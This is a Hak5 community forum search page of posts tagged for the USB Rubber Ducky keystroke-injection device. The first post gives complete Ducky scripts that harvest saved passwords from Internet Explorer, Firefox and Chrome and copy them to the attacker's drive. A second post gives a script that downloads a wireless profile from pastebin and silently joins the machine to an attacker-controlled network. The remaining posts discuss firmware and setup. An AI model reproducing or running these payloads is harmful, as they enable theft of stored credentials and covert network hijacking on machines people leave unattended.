Jump to content

Search the Community

Showing results for tags 'DUCKY'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. So, I didn't see any examples of this, so I tried my best to get some basic ones down. Now, I only tested this on two systems and they seem to work. the timing for some might need to be tweaked. The biggest issue is that each browser uses different methods, so I made one for each... files on flash drive: iepv.exe, evac.txt Internet Explorer 9 This is actually the biggest cheat, as I just used iepassview but it's very portable so with my twin duck, i just threw it on there and it worked like a dream, except it takes like 10 seconds to run... DEFAULTDELAY 50 DELAY 4000 GUI m DELAY 200 CTRL ESC STRING cmd ENTER DELAY 200 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) ENTER DELAY 200 STRING iepv.exe ENTER DELAY 10000 CTRL s DELAY 200 STRING ie_passes.txt ENTER DELAY 1000 ALT F4 DELAY 200 STRING exit ENTER Firefox this copies two files over key3 and signon. once you have them you can just drop them in a profile and go to the passwords section in firefox DEFAULTDELAY 50 DELAY 3000 GUI m DELAY 200 CTRL ESC STRING cmd ENTER DELAY 200 STRING cd %userprofile% ENTER DELAY 200 STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\ TAB STRING \key3.db key3.db ENTER DELAY 200 STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\ TAB STRING \signons.sqlite signons.sqlite ENTER DELAY 200 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: exit: ) ENTER STRING move %userprofile%\key3.db key3.db ENTER DELAY 200 STRING move %userprofile%\signons.sqlite signons.sqlite ENTER STRING exit ENTER Chrome 24 I went to the passwords page, switched all the passwords on manually and screen capped it. The biggest flaw with this one is the password amount. this sample runs 8 passwords. if there are less you have a chance of randomly changing something. if there are more, you don't get all the ones available, which isn't always that big of a deal. this was only tested in chrome 24.0 so it may be different depending on the version. DEFAULTDELAY 50 DELAY 3000 GUI m DELAY 200 CTRL ESC STRING chrome ENTER DELAY 1000 ESCAPE DELAY 500 ALT SPACE STRING x DELAY 200 CTRL l STRING chrome://settings/passwords ENTER DELAY 200 TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB ALT PRINTSCREEN ALT F4 DELAY 400 GUI r STRING mspaint ENTER DELAY 1000 CTRL v DELAY 300 CTRL s DELAY 300 STRING %userprofile%\chrome.png ENTER DELAY 300 ALT f STRING x DELAY 300 CTRL ESC STRING cmd ENTER DELAY 300 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) ENTER DELAY 300 STRING move %userprofile%\chrome.png chrome.png ENTER DELAY 300 STRING exit ENTER look forward to feedback and improvements
  2. Hi guys, I was browsing through a couple of the old payloads on the USB Rubber Ducky wiki and saw that one had been written to associate with the wifi pineapple. The method that was used went through the GUI and took too long. I decided that it must be possible to accomplish using netsh. I threw this script together (originally for my Teensy++, but I rewrote it for the ducky). It uses Mubix' powershell code to download an xml file from pastebin (that I uploaded) and then adds it to the wireless profile using netsh. The whole process takes roughly 6-7 seconds on my Teensy, would be great to hear how you guys get on with it on the ducky! Here is the code: REM Brought to you by Xcellerator DEFAULT_DELAY 200 DELAY 3000 GUI r STRING cmd MENU STRING a ENTER LEFT ENTER STRING cd %TEMP% ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml') ENTER DELAY 1000 ENTER STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection" ENTER STRING del a.xml ENTER STRING exit ENTER [/CODE] You can also find it on the wiki https://github.com/h...ion-(VERY-FAST). The Teensy Version can be found here: http://pastebin.com/c9KSdNAe
  3. Multi-payloads - codenamed "Naked Ducky" http://code.google.com/p/ducky-decode/downloads/ Long awaited I know. Its called m_duck.hex, can also be found in the svn repo. Its not the best piece of firmware I was hoping for, and its rather limited in its application. But you can now trigger multiple payloads! You need to create 3 files on the sdcard, and have a naked ducky (no case) 1. inject.bin - default; ducky will always run this on insertion into a computer 2. inject2.bin 3. inject3.bin Now how do we trigger inject2/3.bin??? With the ducky still connected and naked (no case, sucks I know), enable NUMLOCK (inject2.bin) or enable CAPSLOCK (inject3.bin). Then push the reset switch on the naked duck, to trigger the 2nd/3rd payload. Not the best solution I know. But I havnt had a lot of time this last year on ducky development. And for those interested I still havnt solved the composite problem of having both HID and Mass Storage Support. Been stuck on solving this problem where you can select different payloads based on keyboard lights, without resetting the Ducky - Fail on my part :( Please, Test the new firmware, and report problems here. Thanks Snake PS. I tried to put a copy of the the files needed to flash the ducky on the website above, if I've missed anything please let me know.
  4. Where did it do? The thread I'm reading says it should be here: http://www.hak5.org/duckencode.jar but it's not and I can't seem to find the URL for the web app...
  5. I got a new rubber ducky. Everything seems to work fine except that it only perform the actions when you press the button... When you insert it, the computer detects it, the led becomes green, but no action is performed unless you press the button on it. Any ideas? thank you.
  • Create New...